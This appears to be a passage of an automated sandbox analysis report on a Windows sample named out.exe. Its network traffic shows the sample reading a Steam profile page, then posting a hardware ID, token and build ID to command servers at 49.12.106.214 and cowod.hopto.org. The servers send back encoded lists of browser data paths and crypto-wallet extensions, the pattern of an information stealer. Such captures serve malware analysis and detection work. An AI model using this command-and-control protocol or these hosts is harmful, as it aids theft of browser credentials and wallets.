                                                                                                                                                                                        Oct 7, 2024 20:35:59.176146984 CEST805000045.132.206.251192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:59.176327944 CEST5000080192.168.2.545.132.206.251
                                                                                                                                                                                        Oct 7, 2024 20:36:02.421782970 CEST5000080192.168.2.545.132.206.251

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Oct 7, 2024 20:35:18.359410048 CEST6277053192.168.2.51.1.1.1
                                                                                                                                                                                        Oct 7, 2024 20:35:18.366837025 CEST53627701.1.1.1192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:58.409149885 CEST5402153192.168.2.51.1.1.1
                                                                                                                                                                                        Oct 7, 2024 20:35:58.419862032 CEST53540211.1.1.1192.168.2.5

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Oct 7, 2024 20:35:18.359410048 CEST192.168.2.51.1.1.10x187dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 7, 2024 20:35:58.409149885 CEST192.168.2.51.1.1.10x90e9Standard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Oct 7, 2024 20:35:18.366837025 CEST1.1.1.1192.168.2.50x187dNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                        Oct 7, 2024 20:35:58.419862032 CEST1.1.1.1192.168.2.50x90e9No error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                        • 49.12.106.214
                                                                                                                                                                                        • cowod.hopto.org

                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.55000045.132.206.251801396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Oct 7, 2024 20:35:58.428196907 CEST281OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: cowod.hopto.org
                                                                                                                                                                                        Content-Length: 3193
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Oct 7, 2024 20:35:58.428252935 CEST3193OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61
                                                                                                                                                                                        Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HDAAAAFIIJDBGD
                                                                                                                                                                                        Oct 7, 2024 20:35:59.176146984 CEST188INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:59 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        X-Served-By: cowod.hopto.org


                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.549736104.102.49.2544431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:19 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:19 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:19 GMT
                                                                                                                                                                                        Content-Length: 34889
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: sessionid=5a81f8cda4449a18554b5c56; Path=/; Secure; SameSite=None
                                                                                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                        2024-10-07 18:35:19 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                        2024-10-07 18:35:20 UTC16384INData Raw: 09 53 55 50 50 4f 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e
                                                                                                                                                                                        Data Ascii: SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSn
                                                                                                                                                                                        2024-10-07 18:35:20 UTC3768INData Raw: 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a
                                                                                                                                                                                        Data Ascii: "profile_summary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div>
                                                                                                                                                                                        2024-10-07 18:35:20 UTC223INData Raw: 61 63 6b 22 20 6f 6e 63 6c 69 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                        Data Ascii: ack" onclick="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.54975249.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:21 UTC186OUTGET / HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:21 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.54976349.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:22 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHI
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:22 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 33 35 39 36 45 34 33 32 37 42 31 39 35 33 34 34 38 30 31 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d
                                                                                                                                                                                        Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="hwid"B43596E4327B1953448019-a33c7340-61ca------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HJEHIJEBKEBFBFHIIDHI--
                                                                                                                                                                                        2024-10-07 18:35:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:22 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:23 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|db3d0ad5e24bccd6d193f6b30a0a847b|1|1|1|0|0|50000|10


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.54977449.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:23 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFB
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:23 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------IJEGDBGDBFIJKECBAKFBCont
                                                                                                                                                                                        2024-10-07 18:35:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:24 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:24 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                        Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        4192.168.2.54978249.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:25 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJE
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------DBKEGCAEGIIJKFIEHIJECont
                                                                                                                                                                                        2024-10-07 18:35:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:25 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                        Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        5192.168.2.54979149.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:26 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 332
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:26 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HCFIIIJJKJKFHIDGDBAKCont
                                                                                                                                                                                        2024-10-07 18:35:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:26 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:27 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        6192.168.2.54980249.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:27 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 5801
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
